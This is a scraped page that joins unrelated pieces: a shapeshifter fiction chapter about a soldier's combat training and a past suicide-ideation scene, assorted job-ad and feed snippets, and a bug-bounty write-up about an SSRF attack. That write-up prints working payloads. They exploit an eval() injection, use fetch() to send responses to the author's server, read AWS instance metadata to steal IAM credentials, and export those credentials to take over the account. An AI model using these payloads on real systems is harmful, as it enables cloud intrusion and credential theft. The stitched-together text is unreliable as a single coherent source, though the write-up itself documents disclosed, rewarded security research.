cell phone buzzed in his pocket. Taking it out, he noticed there was no reception. This was a bit odd since he carried a Global SAT Phone. Then it hit him, he had passed over some type of barrier. The air was cleaner, the sky suddenly clear, and the sounds different. He was in the different land. This was a place similar to the Hunting Grounds, however this was where you faced your fears and were either crippled by them, or made whole by them. In either case, he turned off the phone, took off his watch, and removed his phone ear piece. It was time to release all attachment and see what the Elders were going to teach him.

The truck lumbered to a halt as the sun dipped below the horizon and the night started to take over the land. Standing Matt took stock of where he was. Miles from anywhere, in the company of brothers, he was safe. The first thing he noticed was many were in full or partial forms, another benefit of being among kindred souls. Jumping out he was welcomed heartily and ushered into a small meeting space where a meager meal had been prepared. Entering, he paid his respects to the Elder and ate until he was about to pop. Many drinks and laughs later, he was shown to his very primitive hut. It was just what Matt liked. In short order he had laid out his bed roll, stripped out of all his cloths, weapons and gear. Laying down and shifting into his full bear form, for added warmth against the cooling desert night, and drifted into the void peacefully.
In the void, Matt was embraced by something cold. It tingled his fingers and crept over his whole body. The cold was not painful anymore, it was a comfortable, and familiar embrace. The feeling of a well worn shirt, an old pair of sneakers, the familiar grip of his weapon. Matt floated in the void, somewhere between the darkness of dreams and light of the day. Slowly the dark faded and light surround him, waking him gently.
As time progressed he fell right into a simple routine of training, helping the women and old ones prepare meals, hunting, and generally being Matt. He always helps were he can, tries to look out for anyone around him. The older females that would prepare the meals started calling him ‘Paayoo a Hoonaw’, or Bear of Three. Matt was still wondering why the ‘three’, but he just passed it off and hugged them every time he was able. In this village he learned tracking and spirit walking with the other animal spirits. It reminded him greatly of working with his mother and in some ways it felt right and perfect in his mind. As Matt often does he picked up the skills in no time and was rewarded with a new tattoo, given to him in the old way. A ceremony was prepared, drink passed around and foods shared. There was dancing and chanting, most of which Matt was struggling to understand. He had a basic understanding of Native American Languages, but it was childlike at best. Later that night the branding began. With barb, ink, and pain, a message to all was etched into Matt's flesh and bone. Many hours of laying bound by his hands and feet, stretched to make the skin of his back supper tight it was done. Matt now had wings that centered on a staff of truth, that spanned his shoulders and descended to the top of his furry nub of a tail. More drink was passed and Matt soon found himself in a dreamlike stupor, being led out of the village, not really able to resist, not overly caring what was happening. A few steps later his vision faded to blackness and the sounds of footsteps faded into the beating of his own heart, then nothing but blackness.

Waking up some time later, the sun high in the sky, with only his backpack and blades.—

Matt sat up and reached for his pack, most of the contents were still there, all that is expect his weapons, electronics, water, food, and his journal book. Inside Matt panicked. Not that he could not survive without the items, but the journal book was irreplaceable. Looking around, nothing was recognizable. How long had he been asleep? Where was he? Why was he left with no food or water? Was this part of the training? After sitting in that spot for a few minutes, collecting himself he started to look around him and process his environment. From the looks of things, he had been dropped here; literally from the air. No doubt someone at the last camp was Avian. Matt chuckled to himself as he made the connection.
To the West, there was only one trail leading away from this area, so the little Bear started walking. After a while he found some water and nibbled on some other seed plants he found along the way. His mood lifting as he walked. His guard was down, he was learning to be in the moment. To just Be, instead of always processing what was about to happen. Staying on the trail it eventually led to a rock face at the base of a bluff. From the approach he thought he could have made out some huts or pueblo type structures toward the middle and top of the bluff. With no better option, Matt started climbing.
After a time, he made it to the first landing. Delightfully surprised; he found the start to a very remote tribe of were-creatures. Eclectic for sure, but non the less living simply and honestly off the land and with no connection to the outside world. In a way Matt envied them greatly. Wandering through he was greeted and shown to a hut where me met the Elder and several others that were training. Two he remembered from the previous camp, two he didn’t. This meeting was starkly different from the last. The Elder regarded each of them with disgust and guile. In the best he could make out if the broken English - Apache, was that they were to each be tested tomorrow and the training would be tailored from there. He picked Matt to be first in the morning. Then he walked away, leaving them to themselves, to prepare.
In the morning, Matt woke confident and at peace. He was sure he would do well today and that this would be just as easy as the rest of the places and skills he had learned. Picking up his blades and getting dressed he returned to the same meeting spot as last night. The stones were removed, and now the area looked like a ring, with stone walls, roughly 20 meters long and about 15 meters wide. The elder stood and looked at Matt, then motioned him to the center of the area when he held a short spear in one hand and a knife in the other.
The Elder was the first to move. Like lighting! Before the little Bear could even register the movement, Matt was struck through his shoulder by the small arrow head tipped spear. Reacting Matt turned and sliced empty air as the Elder had already moved out of range. Growling and looking at him, trying to process what was happening. Why had this gotten so physical so fast? Did Matt provoke this, or was this part of the training? How was the elder moving like that? Readying himself, he watch the Elder pull out a long blade and Tomahawk from his waist strap. Growling a little louder, Matt reached up and snapped off the small spear still in his shoulder, and took a defensive stance. I have to learn how this is happening, wait..don't attack just yet. Thought Matt as took a half step backward, and reversed the blade in his right hand. Matt was fighting with his favorite weapons, twin short swords. His own design. The handles were a bit wider and longer than most and fit Matt natural fighting style. The blades could also be joined in the middle and extended to made a double bladed short staff.
A flash of movement as the elder buried his blade into Matt gut, ripped it sideways and clubbed Matt across the face with the blunt side of the Tomahawk. Dazed and spinning as he landed on the ground with a dull wet thud. Looking up helpless as the elder spoke. In a broken English/Apache “Who do you Love?” Trying to process the question, his vision faded to black as the void took him, as an ever widening pool of blood formed around him.
Floating in the void, the question filtered through his mind, until he woke slowly. Waking up back on his rock slab, in his sleeping cave, bandaged around his middle and across his shoulder. Sitting up and putting his feet on the floor he realized his boots were gone, along with his shirt and jacket. “What the Fuck” Matt screamed and growled. Then looking up he noticed a small piece of paper stuck under a rock. It was a torn page from his journal that he had brought with him. On the page was a confession of his love for Luke and recounting a time where Matt had considered suicide. Thoughts of ending it all were really nothing out of the ordinary for military members, doing what Matt did. You can’t see and do that much bad without it being damaging on some level. There were times that Matt did question why he survived when others didn’t? Why a group attacked them or why he was protecting a certain few when so many were being killed in collateral damage. It was maddening at times. Crumbling the paper into a ball, crushing it tightly into his hand, the memories of that moment washed over him, with great sadness and guttural force.
Matt was on the porch of their home in Texas. Sitting in the porch swing that hung from the porch rafters, rocking slowly, looking out over the vast acreage that was Luke’s family ranch. The wind was blowing steadily and easily from the East as the sun dipped down behind the very large three story home, casting a long shadow on the ground. Sitting there, on the swing watching the shadows move, he remembered the last 9 days. Sounds and images came in frightening clarity as he listened in his mind to the radio traffic, the sounding of the alarms, then the firefight that had erupted, and the teams escape. This trip Matt was part of a larger security detail. Things had gone horribly wrong. The intel not adequate. A perfect storm of bad events. In short order the team was cut off from each other. Then Matt had snapped, something inside of him rose to the surface and took over. It was like a cold fluid had been poured into his body, taking away all fear, anxiety, compassion, or remorse. The world seemed to slow down slightly, like he was moving faster than everything else around him. He protected his team and the visitors he was tasked with. He did bad things, evil things, he turned into a monster that day. All had escaped with there lives intact, some with minor injuries, but alive. Through the encounter had Matt enjoyed it. He actually enjoyed the destruction he was delivering. It empowered him. He had sent the team ahead, while he covered their escape and joined them soon after. Pushing the team forward, doubling back to cover the retreat. The process repeated with frightening precision. When he ran out of ammunition he used weapons from the dead. When those ran out he used his blades, when those broke he used his hands. Like a drug it tainted his being, raped his soul of all goodness, honor, and compassion. He fought without regard for his own safety, and in so, returned scared, both inside and out. Alive; but broken.
So there Matt sat, with his service weapon on his lap, a single round in the chamber, clicking the safety on and off. Click, thunk. Thunk, click. Click, thunk. The motion and sound repeated without regard to time or space. At some point in Matt sitting there, Luke arrived home from work and found him. Knowing enough to approach gently, he slid the sliding glass door open, stepping out and closing it gently behind him. Seeing what Matt had on lap, he did not question it, and sat gently beside his mate, lover, and friend. After a few minutes of quiet swinging, watching the day become night, Matt was the first to speak.
Luke, am I a bad person?”
No, Matt, you aren’t.”
Well, after this trip I feel like a monster.”
You're not a monster. You do what you have to, but you're not a monster.”
Well, what if I told you innocents died so the team could come back?”
I would say you must not have had a choice.”
They sat in silence. Quietly swinging, just being with one another. It was Luke that would break the silence this time.
Honey, why do you have your weapon on your lap?”
Its there for when I make a decision.”
If the decision is to kill yourself because you think you’re a monster, then so be it. I have never really been able to stop you; but know this. You are the reason I go to work each day. Working to make us a better future. You do the same thing. You fly off to god knows where to make the world a better place. I could not work on a global scale unless you did what you are doing, so if you kill yourself, you are killing the future for me, the children, and their children. Above all else know that I love you, No matter what shape our are in, No matter what you have to do. You come back. Understand that I love you, regardless of anything. I love you with eyes wide open.”
More sitting quietly in the swing as time passed. The day became dusk and then night. A cool breeze had started to blow in and storm clouds were off in the distance coming closer. Matt spoke first.
I have to leave again in the morning.”
Then you better bring our ass back alive and in once piece. When you get back I will keep the nightmares at bay. I will make sure we live in a place where you will not be threatened, with space to call your own. I will make those dreams come true. I need you to come back alive. Do You Hear me?”
I hear you. Thank you. You know my love for you is why I keep doing this?”
I know… just come back. I will put the pieces back together.”
Lost in thought. Matt did not notice that someone was at the entrance to his cave. Turning with a jump he noticed it was one of the other fighters that was training with this Elder. The young Elk motioned for Matt to follow. Leaving the cave, he followed the very young Elk in half form to the meeting circle. There were several rocks sitting around a central open pit fire. Food were being prepared by two female Bison. Matt found a rock and sat down. When Matt was settled and foods passed to him, the elder stood and spoke to them. He asked each of the warriors various questions and explained to them why he had asked it. Matt noticed right away that none of the warriors were without some kind of bandage or injury. The last to be asked, Matt was a little startled when the Elder all but yelled at Matt to answer him. Fumbling with his words he spoke.
I love Luke, my Mate.”
Why”
He doesn't judge me for committing the greatest sin of humans or were creatures. “
What sin is that?”
Killing another and enjoying it even though the killing may be justified.”
He does not judge you for anything then?”
Judgment is NOT accountability. I mess up stuff all the time. The love we have doesn’t excuse the mistakes, it lets us understand them and move forward, because leaving each other is not an option. I love him the same way. Is there a problem with my answer?” Matt glared at the Elder, his own emotions getting the best of him.
The Elder just looked at Matt with those piercing green/blue eyes, then dismissed everyone with a warning. The warning was to rest and contemplate the training that would follow in the coming days, because this first day had only been a small test of skills.
In the coming weeks, the passing of time was marked by pain. Matt was tested and trained in various forms of combat. He learned but it was slow. His normal ability to learn seemed to be cut off or stopped. Painfully, Matt did learn control, timing, patience, and cunning. Each day was a different test, some were puzzles that he needed to solve to get food and water. Others were combat tests were he would have to best another fighter to proceed on. The small Moon Bear did learn, and in time all his trials were completed and he stood before the Elder again.
This time the questions were rapid fire. The Elder would ask and attack. Once Matt had defended against the attack or dealt a blow to the elder another question was asked. The barrage continued for an eternity. Slowly, Matt was letting go of himself. He was beginning to understand that emotions were not the path to his inner strength. He just needed to find his trigger, his way of accessing the endless flow of energy that coursed through every fiber of his being. Matt had been beat down his entire life, used, abused, and then abandoned. Luke had been the first to save Matt from himself, now that bond seemed to be a HUGE topic of contention with this Elder. Through all the questions, Matt kept asking why. Why was Luke so important to this Elder? Did the Elder know something? What was it?
The Sky darkened and the wind picked up as the questions came in a more direct painful manner. The elder would sink his blade into Matt then ask his questions, not letting Matt free until he was satisfied with the answer. “How can you Kill without remorse?” Screamed the Elder with the blade plunged through Matt shoulder from the rear. The Bear was held on his tiptoes as the blade was twisting slowly. Gasping in pain, screaming his reply, “There is always pain, I carry the scars of every person I have had to kill. I never forget” Yanking the blade free of Matt, the elder kicked him to the ground, sliding him a few feet away, and egged him back into he fight.
A few exchanges later, Matt was on his knees, cut from his neck to his groin, the elders antler-hilted blade buried in his guts. “For Whom do you fight?” Growled the elder inches from Matt face. Gasping, panting, almost begging for death Matt muttered, “For Luke.” Grunting, the elder pulled the Blade free and kneed Matt in the face. The little Bear was losing lots of blood. He had to force his shift into his half form so his body would heal. When Matt shifted, something was different, something had changed. Static lit the ground all around Matt as his shift was slow and pronounced. Lighting built int he sky as the wind started a chilly circle around them. Nature was pulling itself to Matt as if by gravity. The static intensified into a loud crack, as several bolts of electricity arched from Matt to nearby onlookers. As Matt stirred from the spot he had been slid to. His paws stretched as his head came up, glaring at the elder. Eyes, glowing a bright blue, he stood, all paused to take notice, even the Elder took a cautious few steps backward. His coat was silver, long guard hairs covered his neck and back. Small stripes of back formed at his eyes and extended down his chest. Cloths falling away, the Bear stretched and flexed his body, inhaling and exhaling deeply.
Then Matt roared. The sound came from some other place, some other being. The roar was long, loud, not common to a Bear, but more akin to a Lion or Wolf. Then it happened. The static charges stopped and all emotion departed from Matt. Something else took its place. Matt had healed himself, but in the shift, something fell into place. His breathing was normal, he was relaxed, finally at peace. At peace with himself and his Mate. His love for Luke and the bond they shared helped him attain inner peace. The one constant in an ever changing world, was their love for each other.
The exchanges that followed were more on Matt terms, as he started to counter the Elder more and more as the fight went on. He had learned well from the pain. The pain had taught his mind and trained his body. He would counter the Elder and throw him away from him. Almost as you would taunt a cub into a fight. Matt was done with this questioning and this form of learning combat. He would not be cut again. At a deadlock of blades, the elder asked his last question, “Why is Luke the center of your World?”. Roaring again and using every ounce of his strength, he shoved the elder backward against the rock walls that surrounded them, shattering the Elders blade, and slamming the Elk hard enough to crack the wall, several of the Elders ribs, and startling many of the onlookers. Matt dropped his blades and spoke to the Elder, “He’s my world, because he saved me from the pit of despair, self doubt, and regret. He is my opposite and my equal. Although I subjugate myself to him in manner, it is my choice to do so. That choice cannot be forced or coerced. He is the center, because he is. Nothing more, nothing less. I WILL NOT continue this fight.” After standing for a few seconds, the Elder turned and walked away from Matt. The daylong lesson of pain was over. Looking down at his paws he noticed his fur was much more gray than he remembered.
Matt collapsed to his knees, then to all fours and he panted. Letting the exhalation of the end of the training wash over him. He thought of Luke. He held the image of the man in his mind, holding onto the good times, all the love they had. After he recovered, Matt reverted back to human form, slowly collected his blades and made his way out of the arena. Turning he looked back at the small space, blood was everywhere, drying in the sun. This place was were you came to find your center, your purpose. Matt had found his, now it was up to him to take these lessons and move forward in life.
Later in the day after Matt had washed himself, he returned to his cave. In the cleansing, communal bath, he washed away the dried blood, the dirt, and the shame. He cleaned his body in the warm water as his soul was cleansed in the burning kiln of combat. Inside the cave, he found all of his gear was returned. Matt reached for the journal book and opened it. The page that had been removed had been replaced, the page showing the signs of crumpling and the tape fresh. Matt hugged the book to his chest and sighed, “Thank you Luke, I love you. You are my everything and nothing. You are by equal and opposite. You are the reason I fight so hard. The reason I push to be a better person. I have to protect you, make sure you are always safe, just like you always took care of me.“ Matt laid down on his bed roll and fell fast asleep. Dreams of Luke came then, way back to when they first met and the instant attraction to the man. The way he smiled, the way he smelled, that devilish laugh. The way he kept the dreams at bay when they slept. A gentle touch that was enough to silence the demons and doubts.
Matt awoke some time later. The moon was high in the sky and most had gone to bed. Wandering through the village, he stopped at a few fires to warm his hands. A few men congratulated him on his test that day. Thanking them, Matt kept moving slowly through the camp. He found the Elder sitting by a fire pit, beside a small hut. There he sat with the Elder and the two chatted as equals and comrades. The spoke to each other with eyes unclouded. Broken Hoof was now a friend and someone Matt could depend on.
Matt would come to spend much time with Broken Hoof over the next lifetime, but that’s a topic for a different story.
To Be Continued—

          Webinar: How Kafka and Modern Databases Benefit Apps and Analytics      Cache   Translate Page      

Apache Kafka is widely used to transmit and store messages between applications. Kafka is fast and scalable, like MemSQL. MemSQL and Kafka work well together. You can find out more, and see a demo, in …

The post Webinar: How Kafka and Modern Databases Benefit Apps and Analytics appeared first on MemSQL Blog.


           Comment on Inktober Day 6: Apache Sunset by Monique       Cache   Translate Page      
Love the ink! Thanks for sharing and what a happy painting!
           Comment on Inktober Day 6: Apache Sunset by Judy Sopher       Cache   Translate Page      
Love it. It is a happy ink painting and so cheerful. And you are brave to use ink in the field.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          AWS takeover through SSRF in JavaScript      Cache   Translate Page      

Here is the story of a bug I found in a private bug bounty program on Hackerone . It toke me exactly 12h30 -no break- to find it, exploit and report. I was able to dump the AWS credentials, this lead me to fully compromise the account of the company: 20 buckets and 80 EC2 instances (Amazon Elastic Compute Cloud) in my hands. Besides the fact that it’s one of my best bug in my hunter career, I also learnt alot during this sprint, so let’s share!

Intro

As I said, the program is private so the company, let’s call it: ArticMonkey.

For the purpose of their activity -and their web application- ArticMonkey has developed a custom macro language, let’s call it: Banan++. I don’t know what language was initially used for the creation of Banan++ but from the webapp you can get a javascript version, let’s dig in!

The original banan++.js file was minified, but still huge, 2.1M compressed, 2.5M beautified, 56441 lines and 2546981 characters, enjoy. No need to say that I didn’t read the whole sh… By searching some keywords very specific to Banan++, I located the first function in line 3348. About 135 functions were available at that time. This was my playground.

Spot the issue

I started to read the code by the top but most of the functions were about date manipulation or mathematical operations, nothing really insteresting or dangerous. After a while, I finally found one called Union() that looked promising, below the code:

helper.prototype.Union = function() { for (var _len22 = arguments.length, args = Array(_len22), _key22 = 0; _key22 < _len22; _key22++) args[_key22] = arguments[_key22]; var value = args.shift(), symbol = args.shift(), results = args.filter(function(arg) { try { return eval(value + symbol + arg) } catch (e) { return !1 } }); return !!results.length }

Did you notice that? Did you notice that kinky eval() ? Looks sooooooooooo interesting! I copied the code on a local HTML file in order to perform more tests.

Basically the function can take from 0 to infinite arguments but start to be useful at 3. The eval() is used to compare the first argument to the third one with the help of the second, then the fourth is tested, the fifth etc… Normal usage should be something like Union(1,'<',3); and the returned value true if at least one of these tests is true or false .

However there is absolutely no sanitization performed or test regarding the type and the value of the arguments. With the help of my favourite debugger -alert()- I understood that an exploit could be triggered in many different ways:

Union( 'alert()//', '2', '3' ); Union( '1', '2;alert();', '3' ); Union( '1', '2', '3;alert()' ); ... Find an injection point

Ok so I had a vulnerable function, which is always good, but what I needed was a input to inject some malicious code. I remembered that I already seen some POST parameters using Banan++ functions so I performed a quick search in my Burp Suite history. Got it:

POST /REDACTED HTTP/1.1 Host: api.REDACTED.com Connection: close Content-Length: 232 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (X11; linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3502.0 Safari/537.36 autochrome/red Content-Type: application/json;charset=UTF-8 Referer: https://app.REDACTED.com/REDACTED Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: auth=REDACTED {...REDACTED...,"operation":"( Year( CurrentDate() ) > 2017 )"}

Response:

HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Content-Length: 54 Connection: close X-Content-Type-Options: nosniff X-Xss-Protection: 1 Strict-Transport-Security: max-age=15768000; includeSubDomains ...REDACTED... [{"name":"REDACTED",...REDACTED...}]

The parameter operation seems to be a good option. Time for testing!

Perform the injection

Since I didn’t know anything about Banan++, I had to perform some tests in order to find out what kind of code I could inject or not. Sort of manual fuzzing.

{...REDACTED...,"operation":"'\"><"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":null} [] {...REDACTED...,"operation":"0"} [] {...REDACTED...,"operation":"1"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"a"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"a=1"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"alert"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"alert()"} {"status":400,"message":"Function 'alert' is not defined"} {...REDACTED...,"operation":"Union()"} []

What I conclued here was:

operation

Let’s continue with Union() :

{...REDACTED...,"operation":"Union(1,2,3)"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union(a,b,c)"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union('a','b','c')"} {"status":400,"message":"Parse error on line 1...REDACTED..."} {...REDACTED...,"operation":"Union('a';'b';'c')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'2';'3')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'<';'3')"} [{"name":"REDACTED",...REDACTED...}] {...REDACTED...,"operation":"Union('1';'>';'3')"} []]

Perfect! If 1 < 3 then the response contains valid datas (true), but if 1 > 3 then the response is empty (false). Parameters must be separated by a semi colon. I could now try a real attack.

fetch is the new XMLHttpRequest

Because the request is an ajax call to the api that only returns JSON datas, it’s obviously not a client side injection. I also knew from a previous report that ArticMonkey tends to use alot JavaScript server side.

But it doesn’t matter, I had to try everything, maybe I could trigger an error that would reveal informations about the system the JavaScript runs on. Since my local testing, I knew exactly how to inject my malicious code. I tried basic XSS payloads and malformed JavaScript but all I got was the error previously mentionned.

I then tried to fire an HTTP request.

Through ajax call first:

x = new XMLHttpRequest; x.open( 'GET','https://poc.myserver.com' ); x.send();

But didn’t receive anything. I tried HTML injection:

i = document.createElement( 'img' ); i.src = '<img src="https://poc.myserver.com/xxx.png">'; document.body.appendChild( i );

But didn’t receive anything! More tries:

document.body.innerHTML += '<img src="https://poc.myserver.com/xxx.png">'; document.body.innerHTML += '<iframe src="https://poc.myserver.com">';

But didn’t receive anything!!!

Sometimes you know, you have to test stupid things by yourself to understand how stupid it was… Obviously it was a mistake to try to render HTML code, but hey! I’m just a hacker… Back to the ajax request, I stay stuck there for a while. It toke me quite a long time to figure out how to make it work.

I finally remembered that ArticMonkey uses ReactJS on their frontend, I would later learnt that they use NodeJS server side. Anyway, I checked on Google how to perform an ajax request with it and found the solution in the official documention which lead me to the fetch() function which is the new standard to perform ajax call, that was the key.

I injected the following:

fetch('https://poc.myserver.com')

And immediately got a new line in my Apache log.

Being able to ping my server is a thing but it’s a blind SSRF, I had no response echoed back. I had the idea to chain two requests where the second would send the result of the first one. Something like:

x1 = new XMLHttpRequest; x1.open( 'GET','https://...', false ); x1.send(); r = x1.responseText; x2 = new XMLHttpRequest; x2.open( 'GET','https://poc.myserver.com/?r='+r, false ); x2.send();

Again it toke me while to get the correct syntax with fetch() . Thanks StackOverflow .

I ended with the following code which works pretty well:

fetch('https://...').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

Of course, Origin policy applies.

SSRF for the win

I firstly tried to read local files:

fetch('file:///etc/issue').then(res=>res.text()).then((r)=>fetch('https://poc.myserver.com/?r='+r));

But the response ( r parameter) in my Apache log file was empty.

Since I found some S3 buckets related to ArticMonkey ( articmonkey-xxx ), I thought that this company might also use AWS servers for their webapp (which was also confirmed by the header in some responses x-cache: Hit from cloudfront ). I quickly jump on the list of the most common SSRF URL for Cloud Instances .

And got a nice hit when I tried to access the metadatas of the instance.
AWS takeover through SSRF in JavaScript

Final payload:

{...REDACTED...,"operation":"Union('1';'2;fetch(\"http://169.254.169.254/latest/meta-data/\").then(res=>res.text()).then((r)=>fetch(\"https://poc.myserver.com/?r=\"+r));';'3')"}

Decoded output is the directory listing returned:

ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname iam/ ...

Since I didn’t know anything about AWS metadatas, because it was my first time in da place. I toke time to explore the directories and all files at my disposition. As you will read everywhere, the most insteresting one is http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE> . Which returned:

{ "Code":"Success", "Type":"AWS-HMAC", "AccessKeyId":"...REDACTED...", "SecretAccessKey":"...REDACTED...", "Token":"...REDACTED...", "Expiration":"2018-09-06T19:24:38Z", "LastUpdated":"2018-09-06T19:09:38Z" } Exploit the credentials

At that time, I though that the game was ended. But for my PoC I wanted to show the criticity of this leak, I wanted something really strong! I tried to use those credentials to impersonate the company. You have to know that they are temporary credentials, only valid for a short period, 5mn more or less. Anyway, 5mn is supposed to be enough to update my own credentials to those ones, 2 copy/paste, I think I can handle that… err…

I asked for help on Twitter from SSRF and AWS master. Thank guys, I truely appreciate your commitment, but I finally found the solution in the UserGuide of AWS Identity and Access Management . My mistake, except to not read the documentation (…), was to only use AccessKeyId and SecretAccessKey , this doesn’t work, the token must also be exported. Kiddies…

$ export AWS_ACCESS_KEY_ID=AKIAI44... $ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI... $ export AWS_SESSION_TOKEN=AQoDYXdzEJr...

Checking my idendity with the following command proved that I was not myself anymore.

aws sts get-caller-identity

And then…


AWS takeover through SSRF in JavaScript

Left: listing of the EC2 instances configured by ArticMonkey. Probably a big part -or the whole- of their system.

Right: the company owns 20 buckets, containing highly sensitive datas from customers, static files for the web application, and according to the name of the buckets, probably logs/backups of their server.

Impact: lethal.

Timeline

06/09/2018 12h00 - beginning of the hunt

07/09/2018 00h30 - report

07/09/2018 19h30 - fix and reward

Thanks to ArticMonkey for being so fast to fix and reward, and agreed this article :)

Conclusion

I learnt alot because of this bug:

ReactJS, fetch(), AWS metadatas. RTFM! The official documentation is always a great source of (useful) informations. At each step new problems appeared. I had to search everywhere, try many different things, I had to push my limits to not give up. I now know that I can fully compromise a system by myself starting from 0, which is a great personal achievement and statisfaction :)

When someone tells you that you’ll never be able to do something, don’t waste your time to bargain with these peoples, simply prove them they’re wong by doing it.


          Développeur Java/JEE - Voonyx - Lac-beauport, QC      Cache   Translate Page      
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Thu, 26 Jul 2018 05:13:45 GMT - View all Lac-beauport, QC jobs
          Java/JEE Developer - Voonyx - Lac-beauport, QC      Cache   Translate Page      
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Thu, 26 Jul 2018 05:13:41 GMT - View all Lac-beauport, QC jobs
          Carlos Tevez: “Pensar en una final de la Copa Libertadores con River sería irrespetuoso con Palmeiras”      Cache   Translate Page      

Tevez toma mate junto a vecinos de Fuerte Apache Fuente: LA NACION – Crédito: Santiago Filipuzzi A cada paso se […]

La entrada Carlos Tevez: “Pensar en una final de la Copa Libertadores con River sería irrespetuoso con Palmeiras” aparece primero en IEVENN.


          Add a feature to ownCloud      Cache   Translate Page      
I have ownCloud installed on my server. Now I would like to connect my various Onedrive for Business accounts with my ownCloud and mount them as external storage. It should be possible to access Onedrive from my ownCloud and also be able to move or delete files... (Budget: €8 - €30 EUR, Jobs: Apache, Javascript, Linux, MySQL, PHP)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Apache Sqoop for Certifications - CCA and HDPCD      Cache   Translate Page      

Apache Sqoop for Certifications - CCA and HDPCD

Apache Sqoop for Certifications - CCA and HDPCD
MP4 | Video: AVC 1280x720 | Audio: AAC 44KHz 2ch | Duration: 6.5 Hours | Lec: 32 | 1.12 GB
Genre: eLearning | Language: English


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Penguin: Open Source Office Alternatives to Microsoft UPDATE 1      Cache   Translate Page      
Open-source office software suites for the enterprise that can rival MS Office 2019 An open-source office software allows users to update to its newer version without a one-time licence fee Best of the Best: Libre Office Apache OpenOffice Only Office Neo Office WPS Office UPDATE 1: Alert Reader writes in: There is SoftMaker’s FreeOffice (German), …
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          IIS attacks surge from 2,000 to 1.7 million over last quarter      Cache   Translate Page      

IIS, Drupal, and Oracle WebLogic web technologies experienced increased attacks in Q2 2018. According to a new threat report from eSentire, IIS attacks showed a massive increase, from 2,000 to 1.7 million, since last quarter. Exploit campaigns observed April 1 – July 1, 2018 Analysis of the attacks revealed that both IIS and WebLogic exploits maintained a consistent number of attacks (about 200) per IP across organizations, with those attacks originating from servers hosting Apache, … More

The post IIS attacks surge from 2,000 to 1.7 million over last quarter appeared first on Help Net Security.


          Comment on Arroway Design Craft Vol.2 by TM      Cache   Translate Page      
All torrent links are not working. click the link and go to the blank page . ---------------------------------------------------------------------------------------------------------------------------------------------------------- Not Found The requested URL /torrents.php was not found on this server. Apache/2.4.7 (Ubuntu) Server at gfxpeers.net Port 80
          Bug / IssueSpecial characters dissapear      Cache   Translate Page      
Hi, Since we've migrated vBulletin5 from Ubuntu to Windows we're experiencing issues with special characters like é, ö, è, €, etc. On Ubuntu we were running Apache and PHP7.0 (I think). On the...
          Allure Ranch Ultimate Desire      Cache   Translate Page      
